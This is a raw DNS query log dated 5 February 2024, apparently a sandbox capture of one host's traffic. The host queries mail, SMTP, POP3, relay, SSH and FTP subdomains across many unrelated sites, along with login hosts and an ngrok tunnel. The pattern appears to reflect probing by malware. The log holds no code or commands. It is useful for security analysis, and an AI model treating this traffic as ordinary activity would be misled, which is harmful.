                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.662506104 CET1.1.1.1192.168.2.60x85b4Name error (3)mail.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.668960094 CET1.1.1.1192.168.2.60x1aeServer failure (2)mail.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.678833961 CET1.1.1.1192.168.2.60x6ec2No error (0)srienlinea.sri.gob.ec190.152.216.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.686903954 CET1.1.1.1192.168.2.60xbb34No error (0)hi-in.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.686903954 CET1.1.1.1192.168.2.60xbb34No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.686903954 CET1.1.1.1192.168.2.60xbb34No error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.687479019 CET1.1.1.1192.168.2.60x3a6bNo error (0)mxa-00569201.gslb.pphosted.com205.220.166.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.703900099 CET1.1.1.1192.168.2.60x2895Name error (3)mailgate.contribuyente.seniat.gob.venonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.709175110 CET1.1.1.1192.168.2.60x15ebName error (3)pop3.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.711620092 CET1.1.1.1192.168.2.60xbe93Name error (3)mail.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.731429100 CET1.1.1.1192.168.2.60xe226No error (0)oferta.senasofiaplus.edu.co186.113.7.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.735999107 CET1.1.1.1192.168.2.60x37aaServer failure (2)mailgate.signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.742657900 CET1.1.1.1192.168.2.60x366Name error (3)app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.770867109 CET1.1.1.1192.168.2.60x2ce8Name error (3)relay.ro.bongacams.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.791754007 CET1.1.1.1192.168.2.60xccafNo error (0)account.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.801028967 CET1.1.1.1192.168.2.60x6c92No error (0)cloud.simplify3d.com44.233.131.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.801028967 CET1.1.1.1192.168.2.60x6c92No error (0)cloud.simplify3d.com34.208.174.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.804208040 CET1.1.1.1192.168.2.60xaa8cNo error (0)pt.secure.imvu.comsecure.imvu.sl.smartling.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.804208040 CET1.1.1.1192.168.2.60xaa8cNo error (0)secure.imvu.sl.smartling.com54.183.63.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.804208040 CET1.1.1.1192.168.2.60xaa8cNo error (0)secure.imvu.sl.smartling.com52.52.207.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.832743883 CET1.1.1.1192.168.2.60x295dName error (3)etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862020969 CET1.1.1.1192.168.2.60xa385No error (0)tiktok.com13.249.120.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862020969 CET1.1.1.1192.168.2.60xa385No error (0)tiktok.com13.249.120.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862020969 CET1.1.1.1192.168.2.60xa385No error (0)tiktok.com13.249.120.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.862020969 CET1.1.1.1192.168.2.60xa385No error (0)tiktok.com13.249.120.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863554955 CET1.1.1.1192.168.2.60xcdc1No error (0)connect.appen.com3.163.115.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863554955 CET1.1.1.1192.168.2.60xcdc1No error (0)connect.appen.com3.163.115.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863554955 CET1.1.1.1192.168.2.60xcdc1No error (0)connect.appen.com3.163.115.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863554955 CET1.1.1.1192.168.2.60xcdc1No error (0)connect.appen.com3.163.115.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863814116 CET1.1.1.1192.168.2.60xa575No error (0)account.booking.comdu1b3vb35hc0o.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863814116 CET1.1.1.1192.168.2.60xa575No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863814116 CET1.1.1.1192.168.2.60xa575No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863814116 CET1.1.1.1192.168.2.60xa575No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.863814116 CET1.1.1.1192.168.2.60xa575No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.865271091 CET1.1.1.1192.168.2.60x55b5No error (0)3fba-180-252-166-236.ngrok.io3.134.125.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.865271091 CET1.1.1.1192.168.2.60x55b5No error (0)3fba-180-252-166-236.ngrok.io3.22.30.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.865271091 CET1.1.1.1192.168.2.60x55b5No error (0)3fba-180-252-166-236.ngrok.io3.134.39.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.865271091 CET1.1.1.1192.168.2.60x55b5No error (0)3fba-180-252-166-236.ngrok.io3.14.182.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.865271091 CET1.1.1.1192.168.2.60x55b5No error (0)3fba-180-252-166-236.ngrok.io3.13.191.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.873436928 CET1.1.1.1192.168.2.60x4d0bNo error (0)accounts.binance.comd2dbdn71e1vorj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.873436928 CET1.1.1.1192.168.2.60x4d0bNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.873436928 CET1.1.1.1192.168.2.60x4d0bNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.873436928 CET1.1.1.1192.168.2.60x4d0bNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.873436928 CET1.1.1.1192.168.2.60x4d0bNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.901431084 CET1.1.1.1192.168.2.60x382cNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.901431084 CET1.1.1.1192.168.2.60x382cNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.901431084 CET1.1.1.1192.168.2.60x382cNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.901431084 CET1.1.1.1192.168.2.60x382cNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.901431084 CET1.1.1.1192.168.2.60x382cNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.917907000 CET1.1.1.1192.168.2.60xd13No error (0)web.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.917907000 CET1.1.1.1192.168.2.60xd13No error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.918720961 CET1.1.1.1192.168.2.60x3303No error (0)lookaside.fbsbx.comscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.918720961 CET1.1.1.1192.168.2.60x3303No error (0)scontent.xx.fbcdn.net157.240.14.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.923019886 CET1.1.1.1192.168.2.60x295dName error (3)etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.923408985 CET1.1.1.1192.168.2.60xf325No error (0)es-la.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.923408985 CET1.1.1.1192.168.2.60xf325No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.923408985 CET1.1.1.1192.168.2.60xf325No error (0)star.c10r.facebook.com31.13.66.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.925363064 CET1.1.1.1192.168.2.60xc731No error (0)hero-wars.com18.200.3.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.933645964 CET1.1.1.1192.168.2.60xc1c8No error (0)genshin.mihoyo.comgenshin.mihoyo.com.w.kunlunsl.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.933645964 CET1.1.1.1192.168.2.60xc1c8No error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.933645964 CET1.1.1.1192.168.2.60xc1c8No error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.933645964 CET1.1.1.1192.168.2.60xc1c8No error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.933645964 CET1.1.1.1192.168.2.60xc1c8No error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.939130068 CET1.1.1.1192.168.2.60x6a1cName error (3)pop3.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.939189911 CET1.1.1.1192.168.2.60x6a1cName error (3)pop3.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.953561068 CET1.1.1.1192.168.2.60xf54cName error (3)mail.loopex.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.958574057 CET1.1.1.1192.168.2.60xb503Name error (3)mail.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.968760967 CET1.1.1.1192.168.2.60xb503Name error (3)mail.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.010237932 CET1.1.1.1192.168.2.60x87ebNo error (0)zarkana2.ro188.212.100.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.010257006 CET1.1.1.1192.168.2.60x87ebNo error (0)zarkana2.ro188.212.100.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.016295910 CET1.1.1.1192.168.2.60x8c41No error (0)servicossociais.caixa.gov.brservicossociais.caixa.gov.br.map.azionedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.016295910 CET1.1.1.1192.168.2.60x8c41No error (0)servicossociais.caixa.gov.br.map.azionedge.net179.191.175.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.016295910 CET1.1.1.1192.168.2.60x8c41No error (0)servicossociais.caixa.gov.br.map.azionedge.net179.191.175.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.016295910 CET1.1.1.1192.168.2.60x8c41No error (0)servicossociais.caixa.gov.br.map.azionedge.net179.191.175.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.016295910 CET1.1.1.1192.168.2.60x8c41No error (0)servicossociais.caixa.gov.br.map.azionedge.net89.30.68.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.028059006 CET1.1.1.1192.168.2.60x60eeNo error (0)naukrigulf-com.mail.protection.outlook.com52.101.145.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.028059006 CET1.1.1.1192.168.2.60x60eeNo error (0)naukrigulf-com.mail.protection.outlook.com104.47.74.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.028059006 CET1.1.1.1192.168.2.60x60eeNo error (0)naukrigulf-com.mail.protection.outlook.com52.101.144.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.028059006 CET1.1.1.1192.168.2.60x60eeNo error (0)naukrigulf-com.mail.protection.outlook.com52.101.145.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.028059006 CET1.1.1.1192.168.2.60x60eeNo error (0)naukrigulf-com.mail.protection.outlook.com52.101.144.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.030776978 CET1.1.1.1192.168.2.60xebecNo error (0)mail.pxndx-mcr.boletia.com52.21.29.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.030776978 CET1.1.1.1192.168.2.60xebecNo error (0)mail.pxndx-mcr.boletia.com54.85.194.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.030776978 CET1.1.1.1192.168.2.60xebecNo error (0)mail.pxndx-mcr.boletia.com44.199.96.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.030776978 CET1.1.1.1192.168.2.60xebecNo error (0)mail.pxndx-mcr.boletia.com3.219.54.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.031364918 CET1.1.1.1192.168.2.60x5769No error (0)mx3.tiktok.com35.172.32.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.031364918 CET1.1.1.1192.168.2.60x5769No error (0)mx3.tiktok.com18.139.153.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.050179005 CET1.1.1.1192.168.2.60x12baNo error (0)zuhauseplus.vodafone.deqcolamq.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.050179005 CET1.1.1.1192.168.2.60x12baNo error (0)qcolamq.impervadns.net45.60.74.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.050257921 CET1.1.1.1192.168.2.60x12baNo error (0)zuhauseplus.vodafone.deqcolamq.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.050257921 CET1.1.1.1192.168.2.60x12baNo error (0)qcolamq.impervadns.net45.60.74.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.053533077 CET1.1.1.1192.168.2.60xd0baNo error (0)pl-pl.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.053533077 CET1.1.1.1192.168.2.60xd0baNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.053533077 CET1.1.1.1192.168.2.60xd0baNo error (0)star.c10r.facebook.com31.13.66.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.056543112 CET1.1.1.1192.168.2.60xb401No error (0)mx.nexters.com54.216.244.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.059070110 CET1.1.1.1192.168.2.60x7f9aNo error (0)uh-is.mail.protection.outlook.com52.101.68.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.059070110 CET1.1.1.1192.168.2.60x7f9aNo error (0)uh-is.mail.protection.outlook.com52.101.68.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.059070110 CET1.1.1.1192.168.2.60x7f9aNo error (0)uh-is.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.059070110 CET1.1.1.1192.168.2.60x7f9aNo error (0)uh-is.mail.protection.outlook.com52.101.73.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.059070110 CET1.1.1.1192.168.2.60x7f9aNo error (0)uh-is.mail.protection.outlook.com52.101.73.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.059070110 CET1.1.1.1192.168.2.60x7f9aNo error (0)uh-is.mail.protection.outlook.com52.101.73.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.059070110 CET1.1.1.1192.168.2.60x7f9aNo error (0)uh-is.mail.protection.outlook.com52.101.73.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.069183111 CET1.1.1.1192.168.2.60xef44No error (0)alt2.aspmx.l.google.com108.177.12.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.090133905 CET1.1.1.1192.168.2.60xa86eNo error (0)iam.gov.sa78.93.109.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.114613056 CET1.1.1.1192.168.2.60x1f05No error (0)ftp.multiideas.commultiideas.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.114613056 CET1.1.1.1192.168.2.60x1f05No error (0)multiideas.com192.185.5.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.117495060 CET1.1.1.1192.168.2.60x775aName error (3)relay.naukrigulf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.121253967 CET1.1.1.1192.168.2.60xa5fcName error (3)smtp.analvids.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.129224062 CET1.1.1.1192.168.2.60x3e87Name error (3)relay.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.129642010 CET1.1.1.1192.168.2.60x6556Name error (3)ftp.zuhauseplus.vodafone.denonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.129668951 CET1.1.1.1192.168.2.60x6556Name error (3)ftp.zuhauseplus.vodafone.denonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.130804062 CET1.1.1.1192.168.2.60xbaeaName error (3)mail.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.151452065 CET1.1.1.1192.168.2.60x17fbServer failure (2)mailgate.brasilliker.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.165667057 CET1.1.1.1192.168.2.60xf17Name error (3)mailgate.mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.194169998 CET1.1.1.1192.168.2.60xf3acName error (3)mail.s163-es.ogame.gameforge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.198788881 CET1.1.1.1192.168.2.60xdb84Name error (3)mobile.liga365gacor.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.202147961 CET1.1.1.1192.168.2.60xaf4dName error (3)ssh.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.207798004 CET1.1.1.1192.168.2.60x2930Name error (3)relay.netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212265015 CET1.1.1.1192.168.2.60xd876Name error (3)ssh.sii.itzacatepec.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.213814020 CET1.1.1.1192.168.2.60x6855Name error (3)mailgate.account.live.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.216547966 CET1.1.1.1192.168.2.60xd905Name error (3)mailgate.vidcorn.tvnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.235192060 CET1.1.1.1192.168.2.60x6f77Name error (3)relay.v.xsanime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.237381935 CET1.1.1.1192.168.2.60x2ffdName error (3)mail.transaccional.saludtotal.com.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.263897896 CET1.1.1.1192.168.2.60x2e83Name error (3)ssh.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.265919924 CET1.1.1.1192.168.2.60x87c4No error (0)th-th.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.265919924 CET1.1.1.1192.168.2.60x87c4No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.265919924 CET1.1.1.1192.168.2.60x87c4No error (0)star.c10r.facebook.com31.13.88.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.283821106 CET1.1.1.1192.168.2.60xfc29Name error (3)pop3.midetuvelocidad.claro.com.penonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.292637110 CET1.1.1.1192.168.2.60xfa8dName error (3)ftp.etd.lib.tuke.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.293359041 CET1.1.1.1192.168.2.60x9bffNo error (0)ww7.chainmine.io76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.293359041 CET1.1.1.1192.168.2.60x9bffNo error (0)76899.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.318280935 CET1.1.1.1192.168.2.60x9388No error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.318280935 CET1.1.1.1192.168.2.60x9388No error (0)5s5tsl3.impervadns.net45.60.0.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.318341017 CET1.1.1.1192.168.2.60x9388No error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.318341017 CET1.1.1.1192.168.2.60x9388No error (0)5s5tsl3.impervadns.net45.60.0.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.329551935 CET1.1.1.1192.168.2.60x87c4No error (0)th-th.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.329551935 CET1.1.1.1192.168.2.60x87c4No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.329551935 CET1.1.1.1192.168.2.60x87c4No error (0)star.c10r.facebook.com31.13.88.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.330359936 CET1.1.1.1192.168.2.60x9335No error (0)mx1.hostinger.com172.65.182.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.334265947 CET1.1.1.1192.168.2.60xb196Name error (3)smtp.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.340538025 CET1.1.1.1192.168.2.60x297cName error (3)mailgate.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.350933075 CET1.1.1.1192.168.2.60xb53eName error (3)imap.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.454356909 CET1.1.1.1192.168.2.60x297cName error (3)mailgate.uh.isnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.456559896 CET1.1.1.1192.168.2.60x200dName error (3)pop3.tls21.netnonenoneA (IP address)IN (0x0001)false
